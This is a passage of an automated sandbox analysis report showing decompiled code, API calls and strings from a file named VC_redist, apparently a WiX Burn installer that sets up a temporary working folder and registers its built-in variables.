                                                                          0x000c81a1
                                                                          0x00000000
                                                                          0x000c81a1
                                                                          0x000c817f
                                                                          0x000c817f
                                                                          0x00000000
                                                                          0x000c817f
                                                                          0x000c8134
                                                                          0x000c8134
                                                                          0x000c8145
                                                                          0x000c814f
                                                                          0x000c815d
                                                                          0x000c8162
                                                                          0x000c8284
                                                                          0x000c8284
                                                                          0x000c8285
                                                                          0x000c828b
                                                                          0x000c8132
                                                                          0x000c811d
                                                                          0x000c829e

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?), ref: 000C8104
                                                                            • Part of subcall function 000F076C: OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,000C8110,00000000), ref: 000F078A
                                                                            • Part of subcall function 000F076C: GetLastError.KERNEL32(?,?,?,?,000C8110,00000000), ref: 000F0794
                                                                            • Part of subcall function 000F076C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,000C8110,00000000), ref: 000F081D
                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 000C812A
                                                                          • GetLastError.KERNEL32 ref: 000C8134
                                                                          • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 000C81B1
                                                                          • GetLastError.KERNEL32 ref: 000C81BB
                                                                          Strings
                                                                          • Failed to create working folder guid., xrefs: 000C8207
                                                                          • Failed to copy working folder path., xrefs: 000C827F
                                                                          • cache.cpp, xrefs: 000C8158, 000C81DF, 000C8230
                                                                          • Failed to convert working folder guid into string., xrefs: 000C823A
                                                                          • Failed to append bundle id on to temp path for working folder., xrefs: 000C8264
                                                                          • Failed to get windows path for working folder., xrefs: 000C8162
                                                                          • %ls%ls\, xrefs: 000C824C
                                                                          • Failed to concat Temp directory on windows path for working folder., xrefs: 000C81A1
                                                                          • Failed to ensure windows path for working folder ended in backslash., xrefs: 000C817F
                                                                          • Failed to get temp path for working folder., xrefs: 000C81E9
                                                                          • Temp\, xrefs: 000C8189
                                                                          • @Met, xrefs: 000C8134, 000C81BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Process$ChangeCloseCurrentDirectoryFindNotificationOpenPathTempTokenWindows
                                                                          • String ID: %ls%ls\$@Met$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                          • API String ID: 58964441-2272642251
                                                                          • Opcode ID: c7ac3d8a55df5e0a99258fc1c9d1c94954ec9d1fcfdd65be34fcb2980f38cc6f
                                                                          • Instruction ID: 5b7b2f44bd8d6caff38fb172320fb0af479cfb0be97ef868ad88f42199755f99
                                                                          • Opcode Fuzzy Hash: c7ac3d8a55df5e0a99258fc1c9d1c94954ec9d1fcfdd65be34fcb2980f38cc6f
                                                                          • Instruction Fuzzy Hash: 0741E472A40724ABEB60A7A4CD4AFEF73ECAB04710F108169FD45E7181EB749D448BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B7503 Relevance: 33.4, APIs: 1, Strings: 21, Instructions: 378COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1374 b7503-b7dc0 InitializeCriticalSection 1375 b7dc3-b7de0 call b5530 1374->1375 1378 b7ded-b7dfb call f012f 1375->1378 1379 b7de2-b7de9 1375->1379 1382 b7dfe-b7e10 call dde36 1378->1382 1379->1375 1380 b7deb 1379->1380 1380->1382
                                                                          C-Code - Quality: 100%
                                                                          			E000B7503(struct _CRITICAL_SECTION* _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char* _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char* _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				intOrPtr _v124;
				char* _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char* _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr _v184;
				char* _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				intOrPtr _v204;
				char* _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				intOrPtr _v224;
				char* _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char* _v248;
				char _v252;
				char _v256;
				char _v260;
				intOrPtr _v264;
				char* _v268;
				char _v272;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				char* _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char* _v308;
				char _v312;
				char _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				char* _v328;
				char _v332;
				char _v336;
				char _v340;
				intOrPtr _v344;
				char* _v348;
				char _v352;
				char _v356;
				char _v360;
				intOrPtr _v364;
				char* _v368;
				char _v372;
				char _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				char* _v388;
				char _v392;
				char _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				char* _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char* _v428;
				char _v432;
				char _v436;
				char _v440;
				intOrPtr _v444;
				char* _v448;
				char _v452;
				char _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				char* _v468;
				char _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				char* _v488;
				char _v492;
				char _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				char* _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				char* _v528;
				char _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				char* _v548;
				char _v552;
				char _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				char* _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char* _v588;
				char _v592;
				char _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				char* _v608;
				char _v612;
				char _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				char* _v628;
				char _v632;
				char _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				char* _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				char* _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				char* _v688;
				char _v692;
				char _v696;
				char _v700;
				intOrPtr _v704;
				char* _v708;
				char _v712;
				char _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				char* _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				char* _v748;
				char _v752;
				char _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				char* _v768;
				char _v772;
				char _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				char* _v788;
				char _v792;
				char _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char* _v808;
				char _v812;
				char _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				char* _v828;
				char _v832;
				char _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				char* _v848;
				char _v852;
				char _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				char* _v868;
				char _v872;
				char _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				char* _v888;
				char _v892;
				char _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				char* _v908;
				char _v912;
				char _v916;
				char _v920;
				intOrPtr _v924;
				char* _v928;
				char _v932;
				char _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				char* _v948;
				char _v952;
				char _v956;
				char _v960;
				intOrPtr _v964;
				char* _v968;
				char _v972;
				char _v976;
				char _v980;
				intOrPtr _v984;
				char* _v988;
				char _v992;
				char _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				char* _v1008;
				char _v1012;
				char _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				char* _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				intOrPtr _v1044;
				char* _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				intOrPtr _v1064;
				char* _v1068;
				char _v1072;
				char _v1076;
				char _v1080;
				intOrPtr _v1084;
				char* _v1088;
				char _v1092;
				char _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				char* _v1108;
				char _v1112;
				char _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				char* _v1128;
				char _v1132;
				char _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				char* _v1148;
				char _v1152;
				char _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				char* _v1168;
				char _v1172;
				char _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				char* _v1188;
				char _v1192;
				char _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				char* _v1208;
				char _v1212;
				char _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				char* _v1228;
				struct _CRITICAL_SECTION* _v1232;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t317;
				struct _CRITICAL_SECTION* _t319;
				intOrPtr _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				void* _t328;
				intOrPtr _t333;
				intOrPtr _t335;
				intOrPtr _t336;
				intOrPtr _t338;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t347;
				char _t348;
				signed int _t349;

				_t317 =  *0x11a008; // 0xf77c1860
				_v8 = _t317 ^ _t349;
				_t319 = _a4;
				_v1232 = _t319;
				InitializeCriticalSection(_t319);
				_t348 = 0;
				_v1228 = L"AdminToolsFolder";
				_t320 = 0x2b;
				_v1220 = 0x30;
				_v1224 = E000B5EAB;
				_v1216 = 0;
				_t335 = 6;
				_v1212 = 0;
				_v1208 = L"AppDataFolder";
				_v1204 = E000B5EAB;
				_v1200 = 0x1a;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = L"CommonAppDataFolder";
				_v1184 = E000B5EAB;
				_v1180 = 0x23;
				_v1176 = 0;
				_v1172 = 0;
				_v1168 = L"CommonFiles64Folder";
				_v1164 = E000B6418;
				_v1160 = _t320;
				_v1156 = 0;
				_v1152 = 0;
				_v1148 = L"CommonFilesFolder";
				_v1144 = E000B5EAB;
				_v1140 = _t320;
				_v1136 = 0;
				_v1132 = 0;
				_v1128 = L"CommonFiles6432Folder";
				_v1124 = E000B5D71;
				_v1120 = _t320;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = L"CompatibilityMode";
				_v1104 = E000B6184;
				_v1100 = 0xc;
				_v1096 = 0;
				_v1092 = 0;
				_v1088 = L"Date";
				_v1084 = E000B5F14;
				_v1080 = 0;
				_v1076 = 0;
				_v1072 = 0;
				_v1068 = L"ComputerName";
				_v1064 = E000B5E0B;
				_v1060 = 0;
				_v1056 = 0;
				_v1052 = 0;
				_v1048 = L"DesktopFolder";
				_v1044 = E000B5EAB;
				_v1040 = 0;
				_v1036 = 0;
				_v1032 = 0;
				_v1028 = L"FavoritesFolder";
				_v1024 = E000B5EAB;
				_v1020 = _t335;
				_v1016 = 0;
				_v1012 = 0;
				_v1008 = L"FontsFolder";
				_v1004 = E000B5EAB;
				_v1000 = 0x14;
				_v996 = 0;
				_v992 = 0;
				_v988 = L"InstallerName";
				_v984 = E000B602F;
				_v980 = 0;
				_v976 = 0;
				_v972 = 0;
				_v968 = L"InstallerVersion";
				_t321 = 5;
				_v944 = E000B5EAB;
				_v904 = E000B5EAB;
				_t333 = 7;
				_v840 = _t335;
				_t336 = 9;
				_v884 = E000B6184;
				_v864 = E000B6184;
				_v844 = E000B6184;
				_v824 = E000B6184;
				_v804 = E000B6184;
				_v784 = E000B6184;
				_v764 = E000B6184;
				_v744 = E000B6184;
				_t342 = 0xb;
				_v964 = E000B605C;
				_v960 = 0;
				_v956 = 0;
				_v952 = 0;
				_v948 = L"LocalAppDataFolder";
				_v940 = 0x1c;
				_v936 = 0;
				_v932 = 0;
				_v928 = L"LogonUser";
				_v924 = E000B60BA;
				_v920 = 0;
				_v916 = 0;
				_v912 = 0;
				_v908 = L"MyPicturesFolder";
				_v900 = 0x27;
				_v896 = 0;
				_v892 = 0;
				_v888 = L"NTProductType";
				_v880 = 4;
				_v876 = 0;
				_v872 = 0;
				_v868 = L"NTSuiteBackOffice";
				_v860 = _t321;
				_v856 = 0;
				_v852 = 0;
				_v848 = L"NTSuiteDataCenter";
				_v836 = 0;
				_v832 = 0;
				_v828 = L"NTSuiteEnterprise";
				_v820 = E000B5EAB;
				_v816 = 0;
				_v812 = 0;
				_v808 = L"NTSuitePersonal";
				_v800 = 8;
				_v796 = 0;
				_v792 = 0;
				_v788 = L"NTSuiteSmallBusiness";
				_v780 = _t336;
				_v776 = 0;
				_v772 = 0;
				_v768 = L"NTSuiteSmallBusinessRestricted";
				_v760 = 0xa;
				_v756 = 0;
				_v752 = 0;
				_v748 = L"NTSuiteWebServer";
				_v740 = E000B6184;
				_v736 = 0;
				_v732 = 0;
				_v728 = L"PersonalFolder";
				_v724 = E000B5EAB;
				_v720 = _t321;
				_v716 = 0;
				_v712 = 0;
				_v708 = L"Privileged";
				_v704 = E000B6360;
				_v700 = 0;
				_v696 = 0;
				_v692 = 0;
				_v688 = L"ProcessorArchitecture";
				_v684 = E000B65DF;
				_v680 = 0xe;
				_v676 = 0;
				_t322 = 0x26;
				_v660 = _t322;
				_v640 = _t322;
				_v620 = _t322;
				_v604 = E000B5EAB;
				_v564 = E000B5EAB;
				_v524 = E000B5EAB;
				_v504 = E000B5EAB;
				_v520 = _t342;
				_v624 = E000B5D71;
				_v560 = _t336;
				_v484 = E000B64B6;
				_v464 = E000B64B6;
				_t346 = 2;
				_v672 = 0;
				_v668 = L"ProgramFiles64Folder";
				_v664 = E000B6418;
				_v656 = 0;
				_v652 = 0;
				_v648 = L"ProgramFilesFolder";
				_v644 = E000B5EAB;
				_v636 = 0;
				_v632 = 0;
				_v628 = L"ProgramFiles6432Folder";
				_v616 = 0;
				_v612 = 0;
				_v608 = L"ProgramMenuFolder";
				_v600 = E000B5D71;
				_v596 = 0;
				_v592 = 0;
				_v588 = L"RebootPending";
				_v584 = E000B63A9;
				_v580 = 0;
				_v576 = 0;
				_v572 = 0;
				_v568 = L"SendToFolder";
				_v556 = 0;
				_v552 = 0;
				_v548 = L"ServicePackLevel";
				_v544 = E000B67E5;
				_v540 = 3;
				_v536 = 0;
				_v532 = 0;
				_v528 = L"StartMenuFolder";
				_v516 = 0;
				_v512 = 0;
				_v508 = L"StartupFolder";
				_v500 = _t333;
				_v496 = 0;
				_v492 = 0;
				_v488 = L"SystemFolder";
				_v480 = 0;
				_v476 = 0;
				_v472 = 0;
				_v468 = L"System64Folder";
				_v460 = 1;
				_v456 = 0;
				_v452 = 0;
				_v448 = L"SystemLanguageID";
				_v444 = E000B5D0D;
				_v440 = 0;
				_v436 = 0;
				_v432 = 0;
				_v428 = L"TempFolder";
				_v424 = E000B6644;
				_v420 = 0;
				_v416 = 0;
				_v412 = 0;
				_v408 = L"TemplateFolder";
				_v404 = E000B5EAB;
				_v400 = 0x15;
				_v396 = 0;
				_v392 = 0;
				_v284 = E000B5EAB;
				_v324 = E000B67E5;
				_v304 = E000B67E5;
				_t338 = E000B648B;
				_v244 = E000B6159;
				_v164 = E000B6159;
				_v144 = E000B6159;
				_v388 = L"TerminalServer";
				_v384 = E000B6184;
				_v380 = 0xd;
				_v376 = 0;
				_v372 = 0;
				_v368 = L"UserLanguageID";
				_v364 = E000B5D3F;
				_v360 = 0;
				_v356 = 0;
				_v352 = 0;
				_v348 = L"VersionMsi";
				_v344 = E000B671C;
				_v340 = 0;
				_v336 = 0;
				_v332 = 0;
				_v328 = L"VersionNT";
				_v320 = 1;
				_v316 = 0;
				_v312 = 0;
				_v308 = L"VersionNT64";
				_v300 = _t346;
				_v296 = 0;
				_v292 = 0;
				_v288 = L"WindowsFolder";
				_v280 = 0x24;
				_v276 = 0;
				_v272 = 0;
				_v268 = L"WindowsVolume";
				_v264 = E000B69B8;
				_v260 = 0;
				_v256 = 0;
				_v252 = 0;
				_v248 = L"WixBundleAction";
				_v240 = 0;
				_v236 = 0;
				_v232 = 1;
				_v228 = L"WixBundleExecutePackageCacheFolder";
				_v224 = E000B648B;
				_v220 = 0;
				_v216 = 0;
				_v212 = 1;
				_v208 = L"WixBundleExecutePackageAction";
				_v204 = E000B648B;
				_v200 = 0;
				_v196 = 0;
				_v192 = 1;
				_v188 = L"WixBundleForcedRestartPackage";
				_v184 = E000B648B;
				_v180 = 0;
				_v176 = 1;
				_v172 = 1;
				_v168 = L"WixBundleInstalled";
				_v160 = 0;
				_v156 = 0;
				_v152 = 1;
				_v148 = L"WixBundleElevated";
				_v140 = 0;
				_v136 = 0;
				_v132 = 1;
				_v128 = L"WixBundleActiveParent";
				_v124 = E000B648B;
				_v120 = 0;
				_v116 = 0;
				_v112 = 1;
				_v108 = L"WixBundleProviderKey";
				_v104 = E000B648B;
				_v100 = 0xfb524;
				_v96 = 0;
				_v92 = 1;
				_v88 = L"WixBundleSourceProcessPath";
				_v84 = E000B648B;
				_v80 = 0;
				_v76 = 0;
				_t347 =  &_v1216;
				_v72 = 1;
				_v68 = L"WixBundleSourceProcessFolder";
				_v64 = E000B648B;
				_v60 = 0;
				_v56 = 0;
				_v52 = 1;
				_v48 = L"WixBundleTag";
				_v44 = E000B648B;
				_v40 = 0xfb524;
				_v36 = 0;
				_v32 = 1;
				_v28 = L"WixBundleVersion";
				_v24 = E000B66F1;
				_v20 = 0;
				_v16 = 0;
				_v12 = 1;
				while(1) {
					_t328 = E000B5530(_t338, _v1232,  *((intOrPtr*)(_t347 - 0xc)),  *((intOrPtr*)(_t347 - 8)),  *((intOrPtr*)(_t347 - 4)),  *_t347,  *((intOrPtr*)(_t347 + 4))); // executed
					_t334 = _t328;
					if(_t328 < 0) {
						break;
					}
					_t348 = _t348 + 1;
					_t347 = _t347 + 0x14;
					if(_t348 < 0x3d) {
						continue;
					} else {
					}
					L5:
					return E000DDE36(_t334, _v8 ^ _t349, 1, _t347, _t348);
				}
				E000F012F(_t334, "Failed to add built-in variable: %ls.",  *((intOrPtr*)(_t347 - 0xc)));
				goto L5;
			}









































































































































































































































































































































                                                                          0x000b750c
                                                                          0x000b7513
                                                                          0x000b7516
                                                                          0x000b751d
                                                                          0x000b7523
                                                                          0x000b7529
                                                                          0x000b752b
                                                                          0x000b7537
                                                                          0x000b753d
                                                                          0x000b754e
                                                                          0x000b7559
                                                                          0x000b755f
                                                                          0x000b7560
                                                                          0x000b7566
                                                                          0x000b7570
                                                                          0x000b7576
                                                                          0x000b7580
                                                                          0x000b7586
                                                                          0x000b758c
                                                                          0x000b7596
                                                                          0x000b759c
                                                                          0x000b75a6
                                                                          0x000b75ac
                                                                          0x000b75b2
                                                                          0x000b75bc
                                                                          0x000b75c6
                                                                          0x000b75cc
                                                                          0x000b75d2
                                                                          0x000b75d8
                                                                          0x000b75e2
                                                                          0x000b75e8
                                                                          0x000b75ee
                                                                          0x000b75f4
                                                                          0x000b75fa
                                                                          0x000b7604
                                                                          0x000b760a
                                                                          0x000b7610
                                                                          0x000b7616
                                                                          0x000b761c
                                                                          0x000b7626
                                                                          0x000b762c
                                                                          0x000b7636
                                                                          0x000b763c
                                                                          0x000b7642
                                                                          0x000b764c
                                                                          0x000b7656
                                                                          0x000b765c
                                                                          0x000b7662
                                                                          0x000b7668
                                                                          0x000b7672
                                                                          0x000b767c
                                                                          0x000b7682
                                                                          0x000b7688
                                                                          0x000b768e
                                                                          0x000b7698
                                                                          0x000b769e
                                                                          0x000b76a4
                                                                          0x000b76aa
                                                                          0x000b76b0
                                                                          0x000b76ba
                                                                          0x000b76c0
                                                                          0x000b76c6
                                                                          0x000b76cc
                                                                          0x000b76d2
                                                                          0x000b76dc
                                                                          0x000b76e2
                                                                          0x000b76ec
                                                                          0x000b76f2
                                                                          0x000b76f8
                                                                          0x000b7702
                                                                          0x000b770c
                                                                          0x000b7712
                                                                          0x000b7718
                                                                          0x000b771e
                                                                          0x000b772a
                                                                          0x000b772d
                                                                          0x000b7733
                                                                          0x000b7739
                                                                          0x000b773c
                                                                          0x000b7742
                                                                          0x000b7745
                                                                          0x000b774b
                                                                          0x000b7751
                                                                          0x000b7757
                                                                          0x000b775d
                                                                          0x000b7763
                                                                          0x000b7769
                                                                          0x000b776f
                                                                          0x000b7775
                                                                          0x000b7776
                                                                          0x000b7780
                                                                          0x000b7786
                                                                          0x000b778c
                                                                          0x000b7792
                                                                          0x000b779c
                                                                          0x000b77a6
                                                                          0x000b77ac
                                                                          0x000b77b2
                                                                          0x000b77bc
                                                                          0x000b77c6
                                                                          0x000b77cc
                                                                          0x000b77d2
                                                                          0x000b77d8
                                                                          0x000b77e2
                                                                          0x000b77ec
                                                                          0x000b77f2
                                                                          0x000b77f8
                                                                          0x000b7802
                                                                          0x000b780c
                                                                          0x000b7812
                                                                          0x000b7818
                                                                          0x000b7822
                                                                          0x000b7828
                                                                          0x000b782e
                                                                          0x000b7834
                                                                          0x000b783e
                                                                          0x000b7844
                                                                          0x000b784a
                                                                          0x000b7854
                                                                          0x000b785a
                                                                          0x000b7860
                                                                          0x000b7866
                                                                          0x000b7870
                                                                          0x000b787a
                                                                          0x000b7880
                                                                          0x000b7886
                                                                          0x000b7890
                                                                          0x000b7896
                                                                          0x000b789c
                                                                          0x000b78a2
                                                                          0x000b78ac
                                                                          0x000b78b6
                                                                          0x000b78bc
                                                                          0x000b78c2
                                                                          0x000b78cc
                                                                          0x000b78d2
                                                                          0x000b78d8
                                                                          0x000b78de
                                                                          0x000b78e8
                                                                          0x000b78f2
                                                                          0x000b78f8
                                                                          0x000b78fe
                                                                          0x000b7904
                                                                          0x000b790e
                                                                          0x000b7918
                                                                          0x000b791e
                                                                          0x000b7924
                                                                          0x000b792a
                                                                          0x000b7934
                                                                          0x000b793e
                                                                          0x000b7948
                                                                          0x000b7950
                                                                          0x000b7951
                                                                          0x000b7957
                                                                          0x000b795d
                                                                          0x000b7968
                                                                          0x000b796e
                                                                          0x000b7974
                                                                          0x000b797a
                                                                          0x000b7985
                                                                          0x000b798f
                                                                          0x000b7996
                                                                          0x000b79a1
                                                                          0x000b79a7
                                                                          0x000b79b2
                                                                          0x000b79b3
                                                                          0x000b79b9
                                                                          0x000b79c3
                                                                          0x000b79cd
                                                                          0x000b79d3
                                                                          0x000b79d9
                                                                          0x000b79e3
                                                                          0x000b79ed
                                                                          0x000b79f3
                                                                          0x000b79f9
                                                                          0x000b7a03
                                                                          0x000b7a09
                                                                          0x000b7a0f
                                                                          0x000b7a19
                                                                          0x000b7a1f
                                                                          0x000b7a25
                                                                          0x000b7a2b
                                                                          0x000b7a35
                                                                          0x000b7a3f
                                                                          0x000b7a45
                                                                          0x000b7a4b
                                                                          0x000b7a51
                                                                          0x000b7a5b
                                                                          0x000b7a61
                                                                          0x000b7a67
                                                                          0x000b7a71
                                                                          0x000b7a77
                                                                          0x000b7a81
                                                                          0x000b7a87
                                                                          0x000b7a8d
                                                                          0x000b7a97
                                                                          0x000b7a9d
                                                                          0x000b7aa3
                                                                          0x000b7aad
                                                                          0x000b7ab3
                                                                          0x000b7ab9
                                                                          0x000b7abf
                                                                          0x000b7ac9
                                                                          0x000b7acf
                                                                          0x000b7ad5
                                                                          0x000b7adb
                                                                          0x000b7ae5
                                                                          0x000b7aeb
                                                                          0x000b7af1
                                                                          0x000b7af7
                                                                          0x000b7b01
                                                                          0x000b7b0b
                                                                          0x000b7b11
                                                                          0x000b7b17
                                                                          0x000b7b1d
                                                                          0x000b7b27
                                                                          0x000b7b31
                                                                          0x000b7b37
                                                                          0x000b7b3d
                                                                          0x000b7b43
                                                                          0x000b7b4d
                                                                          0x000b7b53
                                                                          0x000b7b5d
                                                                          0x000b7b63
                                                                          0x000b7b69
                                                                          0x000b7b74
                                                                          0x000b7b7a
                                                                          0x000b7b80
                                                                          0x000b7b85
                                                                          0x000b7b8b
                                                                          0x000b7b91
                                                                          0x000b7b9c
                                                                          0x000b7ba6
                                                                          0x000b7bb0
                                                                          0x000b7bba
                                                                          0x000b7bc0
                                                                          0x000b7bc6
                                                                          0x000b7bd0
                                                                          0x000b7bda
                                                                          0x000b7be0
                                                                          0x000b7be6
                                                                          0x000b7bec
                                                                          0x000b7bf6
                                                                          0x000b7c00
                                                                          0x000b7c06
                                                                          0x000b7c0c
                                                                          0x000b7c12
                                                                          0x000b7c1c
                                                                          0x000b7c22
                                                                          0x000b7c28
                                                                          0x000b7c2e
                                                                          0x000b7c38
                                                                          0x000b7c3e
                                                                          0x000b7c44
                                                                          0x000b7c4a
                                                                          0x000b7c54
                                                                          0x000b7c5e
                                                                          0x000b7c64
                                                                          0x000b7c6a
                                                                          0x000b7c74
                                                                          0x000b7c7e
                                                                          0x000b7c84
                                                                          0x000b7c8a
                                                                          0x000b7c90
                                                                          0x000b7c9a
                                                                          0x000b7ca0
                                                                          0x000b7ca6
                                                                          0x000b7cac
                                                                          0x000b7cb6
                                                                          0x000b7cbc
                                                                          0x000b7cc2
                                                                          0x000b7cc8
                                                                          0x000b7cce
                                                                          0x000b7cd8
                                                                          0x000b7cde
                                                                          0x000b7ce4
                                                                          0x000b7cea
                                                                          0x000b7cf0
                                                                          0x000b7cfa
                                                                          0x000b7d00
                                                                          0x000b7d06
                                                                          0x000b7d0c
                                                                          0x000b7d12
                                                                          0x000b7d1c
                                                                          0x000b7d22
                                                                          0x000b7d28
                                                                          0x000b7d2e
                                                                          0x000b7d38
                                                                          0x000b7d3e
                                                                          0x000b7d44
                                                                          0x000b7d47
                                                                          0x000b7d4e
                                                                          0x000b7d51
                                                                          0x000b7d54
                                                                          0x000b7d57
                                                                          0x000b7d5a
                                                                          0x000b7d61
                                                                          0x000b7d64
                                                                          0x000b7d67
                                                                          0x000b7d6a
                                                                          0x000b7d6d
                                                                          0x000b7d74
                                                                          0x000b7d77
                                                                          0x000b7d7a
                                                                          0x000b7d7d
                                                                          0x000b7d83
                                                                          0x000b7d86
                                                                          0x000b7d8d
                                                                          0x000b7d90
                                                                          0x000b7d93
                                                                          0x000b7d96
                                                                          0x000b7d99
                                                                          0x000b7da0
                                                                          0x000b7da3
                                                                          0x000b7da6
                                                                          0x000b7da9
                                                                          0x000b7dac
                                                                          0x000b7db3
                                                                          0x000b7dba
                                                                          0x000b7dbd
                                                                          0x000b7dc0
                                                                          0x000b7dc3
                                                                          0x000b7dd7
                                                                          0x000b7ddc
                                                                          0x000b7de0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b7de2
                                                                          0x000b7de3
                                                                          0x000b7de9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b7deb
                                                                          0x000b7dfe
                                                                          0x000b7e10
                                                                          0x000b7e10
                                                                          0x000b7df6
                                                                          0x00000000

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(000C7378,000B52B5,00000000,000B533D), ref: 000B7523
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion
                                                                          • API String ID: 32694325-826827252
                                                                          • Opcode ID: e23bf28a2b2ac740473f17f906fe5acbc389170f678f5fa76e6164ae21e7d7da
                                                                          • Instruction ID: 126fdcdfdaa1c4ac982c601b7832a640850c231f26e1b516d9694ae5a2cba4be
                                                                          • Opcode Fuzzy Hash: e23bf28a2b2ac740473f17f906fe5acbc389170f678f5fa76e6164ae21e7d7da
